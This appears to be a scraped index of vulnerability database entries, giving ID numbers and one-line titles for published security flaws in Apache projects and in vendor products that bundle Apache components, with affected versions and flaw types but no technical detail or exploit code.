| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
| [105643] Apache Pony Mail up to 0.8b weak authentication
| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
| [103690] Apache OpenMeetings 1.0.0 sql injection
| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
| [103688] Apache OpenMeetings 1.0.0 weak encryption
| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
| [103352] Apache Solr Node weak authentication
| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
| [102697] Apache HTTP Server 2.2.32/2.2.24 HTTP Strict Parsing ap_find_token Request Header memory corruption
| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
| [102536] Apache Ranger up to 0.6 Stored cross site scripting
| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
| [101513] Apache jUDDI 3.1.2/3.1.3/3.1.4/3.1. Logout Open Redirect
| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
| [99937] Apache Batik up to 1.8 privilege escalation
| [99936] Apache FOP up to 2.1 privilege escalation
| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
| [99930] Apache Traffic Server up to 6.2.0 denial of service
| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
| [117569] Apache Hadoop up to 2.7.3 privilege escalation
| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
| [99014] Apache Camel Jackson/JacksonXML privilege escalation
| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
| [98605] Apple macOS up to 10.12.3 Apache denial of service
| [98604] Apple macOS up to 10.12.3 Apache denial of service
| [98603] Apple macOS up to 10.12.3 Apache denial of service
| [98602] Apple macOS up to 10.12.3 Apache denial of service
| [98601] Apple macOS up to 10.12.3 Apache denial of service
| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
| [98405] Apache Hadoop up to 0.23.10 privilege escalation
| [98199] Apache Camel Validation XML External Entity
| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
| [97081] Apache Tomcat HTTPS Request denial of service
| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
| [95311] Apache storm UI Daemon privilege escalation
| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
| [94540] Apache Tika 1.9 tika-server File information disclosure
| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
| [93532] Apache Commons Collections Library Java privilege escalation
| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
12437| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
12438| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
| [93098] Apache Commons FileUpload privilege escalation
| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
| [92549] Apache Tomcat on Red Hat privilege escalation
| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
| [90263] Apache Archiva Header denial of service
| [90262] Apache Archiva Deserialize privilege escalation
| [90261] Apache Archiva XML DTD Connection privilege escalation
| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
| [87765] Apache James Server 2.3.2 Command privilege escalation
| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
| [87172] Adobe ColdFusion up to 10 Update 18/11 Update 7/2016 Apache Commons Collections Library privilege escalation
| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
| [82076] Apache Ranger up to 0.5.1 privilege escalation
| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
| [79791] Cisco Products Apache Commons Collections Library privilege escalation
| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
| [78989] Apache Ambari up to 2.1.1 Open Redirect
| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
| [78987] Apache Ambari up to 2.0.x cross site scripting
| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
| [77406] Apache Flex BlazeDS AMF Message XML External Entity
| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
| [76567] Apache Struts 2.3.20 unknown vulnerability
| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
| [74793] Apache Tomcat File Upload denial of service
| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
